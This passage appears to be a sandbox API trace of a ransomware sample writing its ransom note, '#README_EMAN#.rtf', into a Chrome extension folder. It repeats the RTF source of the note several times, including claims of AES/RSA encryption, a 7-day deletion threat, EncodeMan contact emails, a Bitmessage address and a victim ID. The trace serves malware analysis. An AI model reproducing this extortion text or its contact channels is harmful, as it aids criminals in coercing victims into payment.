COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.743] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.744] CloseHandle (hObject=0x2cc) returned 1 [0283.744] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0283.744] GetLastError () returned 0x2 [0283.744] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 